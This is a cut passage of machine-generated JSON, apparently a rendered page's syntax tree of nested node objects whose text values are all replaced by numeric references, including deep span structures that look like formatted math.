tag":38,"props":163199,"children":163200},{},[163201,163202,163207],{"type":31,"value":532},{"type":25,"tag":82,"props":163203,"children":163205},{"className":163204},[],[163206],{"type":31,"value":499},{"type":31,"value":539},{"type":25,"tag":181,"props":163209,"children":163210},{"source":542,"target":543,"direction":544},[],{"type":25,"tag":38,"props":163212,"children":163213},{},[163214,163215,163220,163221,163226],{"type":31,"value":550},{"type":25,"tag":82,"props":163216,"children":163218},{"className":163217},[],[163219],{"type":31,"value":543},{"type":31,"value":557},{"type":25,"tag":82,"props":163222,"children":163224},{"className":163223},[],[163225],{"type":31,"value":563},{"type":31,"value":565},{"type":25,"tag":146,"props":163228,"children":163229},{},[163230],{"type":25,"tag":38,"props":163231,"children":163232},{},[163233],{"type":31,"value":573},{"type":25,"tag":38,"props":163235,"children":163236},{},[163237,163238,163243],{"type":31,"value":578},{"type":25,"tag":82,"props":163239,"children":163241},{"className":163240},[],[163242],{"type":31,"value":584},{"type":31,"value":586},{"type":25,"tag":181,"props":163245,"children":163246},{"addr":589,"line-start":590,"line-end":591},[],{"type":25,"tag":38,"props":163248,"children":163249},{},[163250,163251,163256],{"type":31,"value":597},{"type":25,"tag":82,"props":163252,"children":163254},{"className":163253},[],[163255],{"type":31,"value":499},{"type":31,"value":604},{"type":25,"tag":606,"props":163258,"children":163259},{"id":608},[163260],{"type":31,"value":611},{"type":25,"tag":38,"props":163262,"children":163263},{},[163264,163265,163269],{"type":31,"value":616},{"type":25,"tag":64,"props":163266,"children":163267},{},[163268],{"type":31,"value":621},{"type":31,"value":623},{"type":25,"tag":38,"props":163271,"children":163272},{},[163273],{"type":31,"value":628},{"type":25,"tag":630,"props":163275,"children":163276},{"id":632},[163277],{"type":31,"value":635},{"type":25,"tag":38,"props":163279,"children":163280},{},[163281,163282,163287,163288,163293],{"type":31,"value":640},{"type":25,"tag":82,"props":163283,"children":163285},{"className":163284},[],[163286],{"type":31,"value":543},{"type":31,"value":647},{"type":25,"tag":82,"props":163289,"children":163291},{"className":163290},[],[163292],{"type":31,"value":653},{"type":31,"value":655},{"type":25,"tag":146,"props":163295,"children":163296},{},[163297],{"type":25,"tag":38,"props":163298,"children":163299},{},[163300],{"type":31,"value":663},{"type":25,"tag":181,"props":163302,"children":163303},{"source":666,"target":563,"direction":667,"path":668},[],{"type":25,"tag":38,"props":163305,"children":163306},{},[163307,163308,163313,163314,163319,163320,163325,163326,163331],{"type":31,"value":474},{"type":25,"tag":82,"props":163309,"children":163311},{"className":163310},[],[163312],{"type":31,"value":666},{"type":31,"value":680},{"type":25,"tag":82,"props":163315,"children":163317},{"className":163316},[],[163318],{"type":31,"value":686},{"type":31,"value":688},{"type":25,"tag":82,"props":163321,"children":163323},{"className":163322},[],[163324],{"type":31,"value":694},{"type":31,"value":696},{"type":25,"tag":82,"props":163327,"children":163329},{"className":163328},[],[163330],{"type":31,"value":702},{"type":31,"value":704},{"type":25,"tag":181,"props":163333,"children":163334},{"type-name":707},[],{"type":25,"tag":38,"props":163336,"children":163337},{},[163338,163339,163344,163345,163350,163351,163356,163357,163362],{"type":31,"value":713},{"type":25,"tag":82,"props":163340,"children":163342},{"className":163341},[],[163343],{"type":31,"value":719},{"type":31,"value":721},{"type":25,"tag":82,"props":163346,"children":163348},{"className":163347},[],[163349],{"type":31,"value":727},{"type":31,"value":729},{"type":25,"tag":82,"props":163352,"children":163354},{"className":163353},[],[163355],{"type":31,"value":735},{"type":31,"value":737},{"type":25,"tag":82,"props":163358,"children":163360},{"className":163359},[],[163361],{"type":31,"value":727},{"type":31,"value":744},{"type":25,"tag":181,"props":163364,"children":163365},{"addr":747,"line-start":748,"line-end":749},[],{"type":25,"tag":38,"props":163367,"children":163368},{},[163369],{"type":31,"value":755},{"type":25,"tag":181,"props":163371,"children":163372},{"addr":589,"line-start":758,"line-end":759},[],{"type":25,"tag":38,"props":163374,"children":163375},{},[163376,163377],{"type":31,"value":765},{"type":25,"tag":767,"props":163378,"children":163379},{"lines":769,"addrs":770},[163380],{"type":31,"value":773},{"type":25,"tag":38,"props":163382,"children":163383},{},[163384,163385,163390,163391,163396,163397,163402,163403,163408],{"type":31,"value":778},{"type":25,"tag":82,"props":163386,"children":163388},{"className":163387},[],[163389],{"type":31,"value":784},{"type":31,"value":786},{"type":25,"tag":82,"props":163392,"children":163394},{"className":163393},[],[163395],{"type":31,"value":792},{"type":31,"value":794},{"type":25,"tag":82,"props":163398,"children":163400},{"className":163399},[],[163401],{"type":31,"value":800},{"type":31,"value":802},{"type":25,"tag":82,"props":163404,"children":163406},{"className":163405},[],[163407],{"type":31,"value":808},{"type":31,"value":810},{"type":25,"tag":181,"props":163410,"children":163411},{"addr":589,"line-start":813,"line-end":814},[],{"type":25,"tag":38,"props":163413,"children":163414},{},[163415,163416,163421],{"type":31,"value":820},{"type":25,"tag":162,"props":163417,"children":163419},{"href":823,"rel":163418},[166],[163420],{"type":31,"value":827},{"type":31,"value":829},{"type":25,"tag":630,"props":163423,"children":163424},{"id":832},[163425],{"type":31,"value":835},{"type":25,"tag":38,"props":163427,"children":163428},{},[163429],{"type":31,"value":840},{"type":25,"tag":38,"props":163431,"children":163432},{},[163433,163434,163439,163440,163445,163446,163451],{"type":31,"value":845},{"type":25,"tag":82,"props":163435,"children":163437},{"className":163436},[],[163438],{"type":31,"value":800},{"type":31,"value":852},{"type":25,"tag":82,"props":163441,"children":163443},{"className":163442},[],[163444],{"type":31,"value":694},{"type":31,"value":859},{"type":25,"tag":82,"props":163447,"children":163449},{"className":163448},[],[163450],{"type":31,"value":792},{"type":31,"value":866},{"type":25,"tag":146,"props":163453,"children":163454},{},[163455],{"type":25,"tag":38,"props":163456,"children":163457},{},[163458],{"type":31,"value":874},{"type":25,"tag":181,"props":163460,"children":163461},{"addr":589,"line-start":877,"line-end":878},[],{"type":25,"tag":38,"props":163463,"children":163464},{},[163465,163466,163470,163471,163476,163477,163482],{"type":31,"value":884},{"type":25,"tag":767,"props":163467,"children":163468},{"addrs":887},[163469],{"type":31,"value":890},{"type":31,"value":892},{"type":25,"tag":82,"props":163472,"children":163474},{"className":163473},[],[163475],{"type":31,"value":898},{"type":31,"value":900},{"type":25,"tag":82,"props":163478,"children":163480},{"className":163479},[],[163481],{"type":31,"value":906},{"type":31,"value":908},{"type":25,"tag":181,"props":163484,"children":163485},{"addr":589,"line-start":911,"line-end":912},[],{"type":25,"tag":38,"props":163487,"children":163488},{},[163489],{"type":31,"value":918},{"type":25,"tag":206,"props":163491,"children":163492},{},[163493],{"type":25,"tag":82,"props":163494,"children":163496},{"className":163495},[212,213],[163497],{"type":25,"tag":216,"props":163498,"children":163500},{"className":163499},[219],[163501],{"type":25,"tag":216,"props":163502,"children":163504},{"className":163503},[224],[163505],{"type":25,"tag":216,"props":163506,"children":163508},{"className":163507,"ariaHidden":230},[229],[163509],{"type":25,"tag":216,"props":163510,"children":163512},{"className":163511},[235],[163513,163517],{"type":25,"tag":216,"props":163514,"children":163516},{"className":163515,"style":945},[240],[],{"type":25,"tag":216,"props":163518,"children":163520},{"className":163519},[246],[163521],{"type":25,"tag":216,"props":163522,"children":163524},{"className":163523},[954],[163525,163597],{"type":25,"tag":216,"props":163526,"children":163528},{"className":163527},[959],[163529],{"type":25,"tag":216,"props":163530,"children":163532},{"className":163531},[298,299],[163533,163586],{"type":25,"tag":216,"props":163534,"children":163536},{"className":163535},[304],[163537,163581],{"type":25,"tag":216,"props":163538,"children":163540},{"className":163539,"style":972},[309],[163541,163561],{"type":25,"tag":216,"props":163542,"children":163543},{"style":976},[163544,163548],{"type":25,"tag":216,"props":163545,"children":163547},{"className":163546,"style":981},[319],[],{"type":25,"tag":216,"props":163549,"children":163551},{"className":163550},[246],[163552],{"type":25,"tag":216,"props":163553,"children":163555},{"className":163554},[246,31],[163556],{"type":25,"tag":216,"props":163557,"children":163559},{"className":163558},[246],[163560],{"type":31,"value":996},{"type":25,"tag":216,"props":163562,"children":163563},{"style":999},[163564,163568],{"type":25,"tag":216,"props":163565,"children":163567},{"className":163566,"style":981},[319],[],{"type":25,"tag":216,"props":163569,"children":163571},{"className":163570},[246],[163572],{"type":25,"tag":216,"props":163573,"children":163575},{"className":163574},[246,31],[163576],{"type":25,"tag":216,"props":163577,"children":163579},{"className":163578},[246],[163580],{"type":31,"value":1018},{"type":25,"tag":216,"props":163582,"children":163584},{"className":163583},[408],[163585],{"type":31,"value":411},{"type":25,"tag":216,"props":163587,"children":163589},{"className":163588},[304],[163590],{"type":25,"tag":216,"props":163591,"children":163593},{"className":163592,"style":1031},[309],[163594],{"type":25,"tag":216,"props":163595,"children":163596},{},[],{"type":25,"tag":216,"props":163598,"children":163600},{"className":163599},[1039],[163601],{"type":25,"tag":216,"props":163602,"children":163604},{"className":163603},[298,299],[163605,163800],{"type":25,"tag":216,"props":163606,"children":163608},{"className":163607},[304],[163609,163795],{"type":25,"tag":216,"props":163610,"children":163612},{"className":163611,"style":972},[309],[163613,163736],{"type":25,"tag":216,"props":163614,"children":163615},{"style":976},[163616,163620],{"type":25,"tag":216,"props":163617,"children":163619},{"className":163618,"style":981},[319],[],{"type":25,"tag":216,"props":163621,"children":163623},{"className":163622},[246],[163624,163628,163632,163637,163641],{"type":25,"tag":216,"props":163625,"children":163627},{"className":163626},[246],[],{"type":25,"tag":216,"props":163629,"children":163631},{"className":163630,"style":258},[257],[],{"type":25,"tag":216,"props":163633,"children":163635},{"className":163634},[263],[163636],{"type":31,"value":266},{"type":25,"tag":216,"props":163638,"children":163640},{"className":163639,"style":258},[257],[],{"type":25,"tag":216,"props":163642,"children":163644},{"className":163643},[246],[163645,163649,163732],{"type":25,"tag":216,"props":163646,"children":163648},{"className":163647},[287,288],[],{"type":25,"tag":216,"props":163650,"children":163652},{"className":163651},[293],[163653],{"type":25,"tag":216,"props":163654,"children":163656},{"className":163655},[298,299],[163657,163721],{"type":25,"tag":216,"props":163658,"children":163660},{"className":163659},[304],[163661,163716],{"type":25,"tag":216,"props":163662,"children":163664},{"className":163663,"style":1104},[309],[163665,163685,163696],{"type":25,"tag":216,"props":163666,"children":163667},{"style":314},[163668,163672],{"type":25,"tag":216,"props":163669,"children":163671},{"className":163670,"style":320},[319],[],{"type":25,"tag":216,"props":163673,"children":163675},{"className":163674},[246],[163676],{"type":25,"tag":216,"props":163677,"children":163679},{"className":163678},[246,31],[163680],{"type":25,"tag":216,"props":163681,"children":163683},{"className":163682},[246],[163684],{"type":31,"value":1126},{"type":25,"tag":216,"props":163686,"children":163687},{"style":360},[163688,163692],{"type":25,"tag":216,"props":163689,"children":163691},{"className":163690,"style":320},[319],[],{"type":25,"tag":216,"props":163693,"children":163695},{"className":163694,"style":370},[369],[],{"type":25,"tag":216,"props":163697,"children":163698},{"style":1140},[163699,163703],{"type":25,"tag":216,"props":163700,"children":163702},{"className":163701,"style":320},[319],[],{"type":25,"tag":216,"props":163704,"children":163706},{"className":163705},[246],[163707],{"type":25,"tag":216,"props":163708,"children":163710},{"className":163709},[246,31],[163711],{"type":25,"tag":216,"props":163712,"children":163714},{"className":163713},[246],[163715],{"type":31,"value":1159},{"type":25,"tag":216,"props":163717,"children":163719},{"className":163718},[408],[163720],{"type":31,"value":411},{"type":25,"tag":216,"props":163722,"children":163724},{"className":163723},[304],[163725],{"type":25,"tag":216,"props":163726,"children":163728},{"className":163727,"style":1172},[309],[163729],{"type":25,"tag":216,"props":163730,"children":163731},{},[],{"type":25,"tag":216,"props":163733,"children":163735},{"className":163734},[427,288],[],{"type":25,"tag":216,"props":163737,"children":163738},{"style":999},[163739,163743],{"type":25,"tag":216,"props":163740,"children":163742},{"className":163741,"style":981},[319],[],{"type":25,"tag":216,"props":163744,"children":163746},{"className":163745},[246],[163747,163751,163755,163760,163764,163773,163777,163782,163786],{"type":25,"tag":216,"props":163748,"children":163750},{"className":163749},[246],[],{"type":25,"tag":216,"props":163752,"children":163754},{"className":163753,"style":258},[257],[],{"type":25,"tag":216,"props":163756,"children":163758},{"className":163757},[263],[163759],{"type":31,"value":266},{"type":25,"tag":216,"props":163761,"children":163763},{"className":163762,"style":258},[257],[],{"type":25,"tag":216,"props":163765,"children":163767},{"className":163766},[246,31],[163768],{"type":25,"tag":216,"props":163769,"children":163771},{"className":163770},[246],[163772],{"type":31,"value":1218},{"type":25,"tag":216,"props":163774,"children":163776},{"className":163775,"style":335},[257],[],{"type":25,"tag":216,"props":163778,"children":163780},{"className":163779},[340],[163781],{"type":31,"value":343},{"type":25,"tag":216,"props":163783,"children":163785},{"className":163784,"style":335},[257],[],{"type":25,"tag":216,"props":163787,"children":163789},{"className":163788},[246,31],[163790],{"type":25,"tag":216,"props":163791,"children":163793},{"className":163792},[246],[163794],{"type":31,"value":996},{"type":25,"tag":216,"props":163796,"children":163798},{"className":163797},[408],[163799],{"type":31,"value":411},{"type":25,"tag":216,"props":163801,"children":163803},{"className":163802},[304],[163804],{"type":25,"tag":216,"props":163805,"children":163807},{"className":163806,"style":1031},[309],[163808],{"type":25,"tag":216,"props":163809,"children":163810},{},[],{"type":25,"tag":38,"props":163812,"children":163813},{},[163814],{"type":31,"value":1261},{"type":25,"tag":181,"props":163816,"children":163817},{"addr":589,"line-start":1264,"line-end":1265},[],{"type":25,"tag":38,"props":163819,"children":163820},{},[163821,163822,163826,163827,163832],{"type":31,"value":474},{"type":25,"tag":767,"props":163823,"children":163824},{"lines":1273},[163825],{"type":31,"value":1276},{"type":31,"value":1278},{"type":25,"tag":82,"props":163828,"children":163830},{"className":163829},[],[163831],{"type":31,"value":1284},{"type":31,"value":1286},{"type":25,"tag":38,"props":163834,"children":163835},{},[163836,163837,163842,163843,163848,163849,163854],{"type":31,"value":1291},{"type":25,"tag":82,"props":163838,"children":163840},{"className":163839},[],[163841],{"type":31,"value":1297},{"type":31,"value":1299},{"type":25,"tag":82,"props":163844,"children":163846},{"className":163845},[],[163847],{"type":31,"value":1305},{"type":31,"value":1307},{"type":25,"tag":82,"props":163850,"children":163852},{"className":163851},[],[163853],{"type":31,"value":1313},{"type":31,"value":179},{"type":25,"tag":181,"props":163856,"children":163857},{"addr":589,"line-start":1317,"line-end":1318},[],{"type":25,"tag":38,"props":163859,"children":163860},{},[163861,163862,163867],{"type":31,"value":1324},{"type":25,"tag":82,"props":163863,"children":163865},{"className":163864},[],[163866],{"type":31,"value":1330},{"type":31,"value":1332},{"type":25,"tag":38,"props":163869,"children":163870},{},[163871,163872,163877],{"type":31,"value":1337},{"type":25,"tag":82,"props":163873,"children":163875},{"className":163874},[],[163876],{"type":31,"value":543},{"type":31,"value":1344},{"type":25,"tag":181,"props":163879,"children":163880},{"addr":589,"addr-start":1347,"addr-end":1348},[],{"type":25,"tag":38,"props":163882,"children":163883},{},[163884],{"type":31,"value":1354},{"type":25,"tag":453,"props":163886,"children":163887},{"id":1357},[163888],{"type":31,"value":1360},{"type":25,"tag":38,"props":163890,"children":163891},{},[163892],{"type":31,"value":1365},{"type":25,"tag":38,"props":163894,"children":163895},{},[163896],{"type":31,"value":1370},{"type":25,"tag":38,"props":163898,"children":163899},{},[163900,163901,163906],{"type":31,"value":1375},{"type":25,"tag":162,"props":163902,"children":163904},{"href":1378,"rel":163903},[166],[163905],{"type":31,"value":1382},{"type":31,"value":1384},{"type":25,"tag":38,"props":163908,"children":163909},{},[163910],{"type":31,"value":1389},{"type":25,"tag":26,"props":163912,"children":163913},{"id":1392},[163914],{"type":31,"value":1395},{"type":25,"tag":38,"props":163916,"children":163917},{},[163918,163919,163924,163925,163930,163931,163936],{"type":31,"value":1400},{"type":25,"tag":82,"props":163920,"children":163922},{"className":163921},[],[163923],{"type":31,"value":1406},{"type":31,"value":1408},{"type":25,"tag":82,"props":163926,"children":163928},{"className":163927},[],[163929],{"type":31,"value":1414},{"type":31,"value":1416},{"type":25,"tag":82,"props":163932,"children":163934},{"className":163933},[],[163935],{"type":31,"value":906},{"type":31,"value":1423},{"type":25,"tag":38,"props":163938,"children":163939},{},[163940,163941,163945,163946,163951,163952,163957,163958,163963],{"type":31,"value":1428},{"type":25,"tag":64,"props":163942,"children":163943},{},[163944],{"type":31,"value":1433},{"type":31,"value":1435},{"type":25,"tag":82,"props":163947,"children":163949},{"className":163948},[],[163950],{"type":31,"value":1441},{"type":31,"value":1443},{"type":25,"tag":162,"props":163953,"children":163955},{"href":1446,"rel":163954},[166],[163956],{"type":31,"value":1450},{"type":31,"value":1452},{"type":25,"tag":162,"props":163959,"children":163961},{"href":1455,"rel":163960},[166],[163962],{"type":31,"value":1459},{"type":31,"value":179},{"type":25,"tag":38,"props":163965,"children":163966},{},[163967,163968,163973],{"type":31,"value":1465},{"type":25,"tag":82,"props":163969,"children":163971},{"className":163970},[],[163972],{"type":31,"value":543},{"type":31,"value":1472},{"type":25,"tag":181,"props":163975,"children":163976},{"source":543,"target":1406,"direction":544,"path":1475},[],{"type":25,"tag":38,"props":163978,"children":163979},{},[163980],{"type":31,"value":1481},{"type":25,"tag":181,"props":163982,"children":163983},{"addr":589,"line-start":1484,"line-end":1485},[],{"type":25,"tag":26,"props":163985,"children":163986},{"id":1489},[163987],{"type":31,"value":1492},{"type":25,"tag":206,"props":163989,"children":163990},{},[163991],{"type":25,"tag":82,"props":163992,"children":163994},{"className":163993},[212,213],[163995],{"type":25,"tag":216,"props":163996,"children":163998},{"className":163997},[219],[163999],{"type":25,"tag":216,"props":164000,"children":164002},{"className":164001},[224],[164003],{"type":25,"tag":216,"props":164004,"children":164006},{"className":164005,"ariaHidden":230},[229],[164007,164037],{"type":25,"tag":216,"props":164008,"children":164010},{"className":164009},[235],[164011,164015,164024,164028,164033],{"type":25,"tag":216,"props":164012,"children":164014},{"className":164013,"style":1519},[240],[],{"type":25,"tag":216,"props":164016,"children":164018},{"className":164017},[246,31],[164019],{"type":25,"tag":216,"props":164020,"children":164022},{"className":164021},[246],[164023],{"type":31,"value":1530},{"type":25,"tag":216,"props":164025,"children":164027},{"className":164026,"style":258},[257],[],{"type":25,"tag":216,"props":164029,"children":164031},{"className":164030},[263],[164032],{"type":31,"value":266},{"type":25,"tag":216,"props":164034,"children":164036},{"className":164035,"style":258},[257],[],{"type":25,"tag":216,"props":164038,"children":164040},{"className":164039},[235],[164041,164045],{"type":25,"tag":216,"props":164042,"children":164044},{"className":164043,"style":1551},[240],[],{"type":25,"tag":216,"props":164046,"children":164048},{"className":164047},[246],[164049,164053,164146],{"type":25,"tag":216,"props":164050,"children":164052},{"className":164051},[287,288],[],{"type":25,"tag":216,"props":164054,"children":164056},{"className":164055},[293],[164057],{"type":25,"tag":216,"props":164058,"children":164060},{"className":164059},[298,299],[164061,164135],{"type":25,"tag":216,"props":164062,"children":164064},{"className":164063},[304],[164065,164130],{"type":25,"tag":216,"props":164066,"children":164068},{"className":164067,"style":310},[309],[164069,164089,164100],{"type":25,"tag":216,"props":164070,"children":164071},{"style":314},[164072,164076],{"type":25,"tag":216,"props":164073,"children":164075},{"className":164074,"style":320},[319],[],{"type":25,"tag":216,"props":164077,"children":164079},{"className":164078},[246],[164080],{"type":25,"tag":216,"props":164081,"children":164083},{"className":164082},[246,31],[164084],{"type":25,"tag":216,"props":164085,"children":164087},{"className":164086},[246],[164088],{"type":31,"value":1597},{"type":25,"tag":216,"props":164090,"children":164091},{"style":360},[164092,164096],{"type":25,"tag":216,"props":164093,"children":164095},{"className":164094,"style":320},[319],[],{"type":25,"tag":216,"props":164097,"children":164099},{"className":164098,"style":370},[369],[],{"type":25,"tag":216,"props":164101,"children":164102},{"style":374},[164103,164107],{"type":25,"tag":216,"props":164104,"children":164106},{"className":164105,"style":320},[319],[],{"type":25,"tag":216,"props":164108,"children":164110},{"className":164109},[246],[164111,164116,164125],{"type":25,"tag":216,"props":164112,"children":164114},{"className":164113},[246],[164115],{"type":31,"value":389},{"type":25,"tag":216,"props":164117,"children":164119},{"className":164118},[246,31],[164120],{"type":25,"tag":216,"props":164121,"children":164123},{"className":164122},[246],[164124],{"type":31,"value":399},{"type":25,"tag":216,"props":164126,"children":164128},{"className":164127},[246],[164129],{"type":31,"value":389},{"type":25,"tag":216,"props":164131,"children":164133},{"className":164132},[408],[164134],{"type":31,"value":411},{"type":25,"tag":216,"props":164136,"children":164138},{"className":164137},[304],[164139],{"type":25,"tag":216,"props":164140,"children":164142},{"className":164141,"style":1651},[309],[164143],{"type":25,"tag":216,"props":164144,"children":164145},{},[],{"type":25,"tag":216,"props":164147,"children":164149},{"className":164148},[427,288],[],{"type":25,"tag":38,"props":164151,"children":164152},{},[164153,164154,164159,164160,164165,164166,164171,164172,164177],{"type":31,"value":1664},{"type":25,"tag":82,"props":164155,"children":164157},{"className":164156},[],[164158],{"type":31,"value":1670},{"type":31,"value":1672},{"type":25,"tag":82,"props":164161,"children":164163},{"className":164162},[],[164164],{"type":31,"value":1678},{"type":31,"value":1680},{"type":25,"tag":82,"props":164167,"children":164169},{"className":164168},[],[164170],{"type":31,"value":1686},{"type":31,"value":1688},{"type":25,"tag":82,"props":164173,"children":164175},{"className":164174},[],[164176],{"type":31,"value":1694},{"type":31,"value":179},{"type":25,"tag":38,"props":164179,"children":164180},{},[164181],{"type":31,"value":1700},{"type":25,"tag":181,"props":164183,"children":164184},{"addr":1703,"line-start":1704,"line-end":1705},[],{"type":25,"tag":26,"props":164186,"children":164187},{"id":1709},[164188],{"type":31,"value":1712},{"type":25,"tag":206,"props":164190,"children":164191},{},[164192],{"type":25,"tag":82,"props":164193,"children":164195},{"className":164194},[212,213],[164196],{"type":25,"tag":216,"props":164197,"children":164199},{"className":164198},[219],[164200],{"type":25,"tag":216,"props":164201,"children":164203},{"className":164202},[224],[164204],{"type":25,"tag":216,"props":164205,"children":164207},{"className":164206,"ariaHidden":230},[229],[164208,164238],{"type":25,"tag":216,"props":164209,"children":164211},{"className":164210},[235],[164212,164216,164225,164229,164234],{"type":25,"tag":216,"props":164213,"children":164215},{"className":164214,"style":1519},[240],[],{"type":25,"tag":216,"props":164217,"children":164219},{"className":164218},[246,31],[164220],{"type":25,"tag":216,"props":164221,"children":164223},{"className":164222},[246],[164224],{"type":31,"value":1749},{"type":25,"tag":216,"props":164226,"children":164228},{"className":164227,"style":258},[257],[],{"type":25,"tag":216,"props":164230,"children":164232},{"className":164231},[263],[164233],{"type":31,"value":266},{"type":25,"tag":216,"props":164235,"children":164237},{"className":164236,"style":258},[257],[],{"type":25,"tag":216,"props":164239,"children":164241},{"className":164240},[235],[164242,164246],{"type":25,"tag":216,"props":164243,"children":164245},{"className":164244,"style":278},[240],[],{"type":25,"tag":216,"props":164247,"children":164249},{"className":164248},[246],[164250,164254,164370],{"type":25,"tag":216,"props":164251,"children":164253},{"className":164252},[287,288],[],{"type":25,"tag":216,"props":164255,"children":164257},{"className":164256},[293],[164258],{"type":25,"tag":216,"props":164259,"children":164261},{"className":164260},[298,299],[164262,164359],{"type":25,"tag":216,"props":164263,"children":164265},{"className":164264},[304],[164266,164354],{"type":25,"tag":216,"props":164267,"children":164269},{"className":164268,"style":310},[309],[164270,164290,164301],{"type":25,"tag":216,"props":164271,"children":164272},{"style":314},[164273,164277],{"type":25,"tag":216,"props":164274,"children":164276},{"className":164275,"style":320},[319],[],{"type":25,"tag":216,"props":164278,"children":164280},{"className":164279},[246],[164281],{"type":25,"tag":216,"props":164282,"children":164284},{"className":164283},[246,31],[164285],{"type":25,"tag":216,"props":164286,"children":164288},{"className":164287},[246],[164289],{"type":31,"value":1815},{"type":25,"tag":216,"props":164291,"children":164292},{"style":360},[164293,164297],{"type":25,"tag":216,"props":164294,"children":164296},{"className":164295,"style":320},[319],[],{"type":25,"tag":216,"props":164298,"children":164300},{"className":164299,"style":370},[369],[],{"type":25,"tag":216,"props":164302,"children":164303},{"style":374},[164304,164308],{"type":25,"tag":216,"props":164305,"children":164307},{"className":164306,"style":320},[319],[],{"type":25,"tag":216,"props":164309,"children":164311},{"className":164310},[246],[164312,164317,164322,164331,164336,164340,164344,164349],{"type":25,"tag":216,"props":164313,"children":164315},{"className":164314},[1841],[164316],{"type":31,"value":1844},{"type":25,"tag":216,"props":164318,"children":164320},{"className":164319},[287],[164321],{"type":31,"value":1850},{"type":25,"tag":216,"props":164323,"children":164325},{"className":164324},[246,31],[164326],{"type":25,"tag":216,"props":164327,"children":164329},{"className":164328},[246],[164330],{"type":31,"value":1860},{"type":25,"tag":216,"props":164332,"children":164334},{"className":164333},[1864],[164335],{"type":31,"value":1867},{"type":25,"tag":216,"props":164337,"children":164339},{"className":164338,"style":1871},[257],[],{"type":25,"tag":216,"props":164341,"children":164343},{"className":164342,"style":1871},[257],[],{"type":25,"tag":216,"props":164345,"children":164347},{"className":164346},[246],[164348],{"type":31,"value":1882},{"type":25,"tag":216,"props":164350,"children":164352},{"className":164351},[427],[164353],{"type":31,"value":1888},{"type":25,"tag":216,"props":164355,"children":164357},{"className":164356},[408],[164358],{"type":31,"value":411},{"type":25,"tag":216,"props":164360,"children":164362},{"className":164361},[304],[164363],{"type":25,"tag":216,"props":164364,"children":164366},{"className":164365,"style":419},[309],[164367],{"type":25,"tag":216,"props":164368,"children":164369},{},[],{"type":25,"tag":216,"props":164371,"children":164373},{"className":164372},[427,288],[],{"type":25,"tag":38,"props":164375,"children":164376},{},[164377,164378,164383],{"type":31,"value":1913},{"type":25,"tag":82,"props":164379,"children":164381},{"className":164380},[],[164382],{"type":31,"value":1919},{"type":31,"value":1921},{"type":25,"tag":38,"props":164385,"children":164386},{},[164387],{"type":31,"value":1926},{"type":25,"tag":181,"props":164389,"children":164390},{"addr":1929,"addr-start":1930,"addr-end":1931},[],{"type":25,"tag":38,"props":164392,"children":164393},{},[164394,164395,164400,164401,164406],{"type":31,"value":1937},{"type":25,"tag":82,"props":164396,"children":164398},{"className":164397},[],[164399],{"type":31,"value":1943},{"type":31,"value":1945},{"type":25,"tag":82,"props":164402,"children":164404},{"className":164403},[],[164405],{"type":31,"value":1951},{"type":31,"value":1953},{"type":25,"tag":38,"props":164408,"children":164409},{},[164410],{"type":31,"value":1958},{"type":25,"tag":606,"props":164412,"children":164413},{"id":1961},[164414],{"type":31,"value":1964},{"type":25,"tag":38,"props":164416,"children":164417},{},[164418],{"type":31,"value":1969},{"type":25,"tag":38,"props":164420,"children":164421},{},[164422],{"type":31,"value":1974},{"type":25,"tag":38,"props":164424,"children":164425},{},[164426,164427,164432],{"type":31,"value":1979},{"type":25,"tag":82,"props":164428,"children":164430},{"className":164429},[],[164431],{"type":31,"value":543},{"type":31,"value":1986},{"type":25,"tag":181,"props":164434,"children":164435},{"addr":589,"line-start":1989,"line-end":1990},[],{"type":25,"tag":38,"props":164437,"children":164438},{},[164439],{"type":31,"value":1996},{"type":25,"tag":453,"props":164441,"children":164442},{"id":1999},[164443],{"type":31,"value":2002},{"type":25,"tag":38,"props":164445,"children":164446},{},[164447],{"type":31,"value":2007},{"type":25,"tag":38,"props":164449,"children":164450},{},[164451],{"type":31,"value":2012},{"type":25,"tag":453,"props":164453,"children":164454},{"id":2015},[164455],{"type":31,"value":2018},{"type":25,"tag":26,"props":164457,"children":164458},{"id":2021},[164459],{"type":31,"value":2024},{"type":25,"tag":38,"props":164461,"children":164462},{},[164463,164464,164469],{"type":31,"value":2029},{"type":25,"tag":162,"props":164465,"children":164467},{"href":1378,"rel":164466},[166],[164468],{"type":31,"value":2035},{"type":31,"value":2037},{"type":25,"tag":2039,"props":164471,"children":164472},{},[164473,164481,164489],{"type":25,"tag":2043,"props":164474,"children":164475},{},[164476,164480],{"type":25,"tag":64,"props":164477,"children":164478},{},[164479],{"type":31,"value":2050},{"type":31,"value":2052},{"type":25,"tag":2043,"props":164482,"children":164483},{},[164484,164488],{"type":25,"tag":64,"props":164485,"children":164486},{},[164487],{"type":31,"value":2060},{"type":31,"value":2062},{"type":25,"tag":2043,"props":164490,"children":164491},{},[164492,164496],{"type":25,"tag":64,"props":164493,"children":164494},{},[164495],{"type":31,"value":2070},{"type":31,"value":2072},{"type":25,"tag":38,"props":164498,"children":164499},{},[164500],{"type":31,"value":2077},{"type":25,"tag":206,"props":164502,"children":164503},{},[164504],{"type":25,"tag":82,"props":164505,"children":164507},{"className":164506},[212,213],[164508],{"type":25,"tag":216,"props":164509,"children":164511},{"className":164510},[219],[164512],{"type":25,"tag":216,"props":164513,"children":164515},{"className":164514},[224],[164516],{"type":25,"tag":216,"props":164517,"children":164519},{"className":164518,"ariaHidden":230},[229],[164520],{"type":25,"tag":216,"props":164521,"children":164523},{"className":164522},[235],[164524,164528],{"type":25,"tag":216,"props":164525,"children":164527},{"className":164526,"style":2104},[240],[],{"type":25,"tag":216,"props":164529,"children":164531},{"className":164530},[246],[164532],{"type":25,"tag":216,"props":164533,"children":164535},{"className":164534},[954],[164536,165332],{"type":25,"tag":216,"props":164537,"children":164539},{"className":164538},[959],[164540],{"type":25,"tag":216,"props":164541,"children":164543},{"className":164542},[298,299],[164544,165321],{"type":25,"tag":216,"props":164545,"children":164547},{"className":164546},[304],[164548,165316],{"type":25,"tag":216,"props":164549,"children":164551},{"className":164550,"style":2129},[309],[164552,164620,164636,164704,164772,164840,164908,164976,165044,165112,165180,165248],{"type":25,"tag":216,"props":164553,"children":164554},{"style":2133},[164555,164559],{"type":25,"tag":216,"props":164556,"children":164558},{"className":164557,"style":2138},[319],[],{"type":25,"tag":216,"props":164560,"children":164562},{"className":164561},[246],[164563],{"type":25,"tag":216,"props":164564,"children":164566},{"className":164565},[246],[164567,164572],{"type":25,"tag":216,"props":164568,"children":164570},{"className":164569,"style":2152},[246,2151],[164571],{"type":31,"value":2155},{"type":25,"tag":216,"props":164573,"children":164575},{"className":164574},[2159],[164576],{"type":25,"tag":216,"props":164577,"children":164579},{"className":164578},[298,299],[164580,164609],{"type":25,"tag":216,"props":164581,"children":164583},{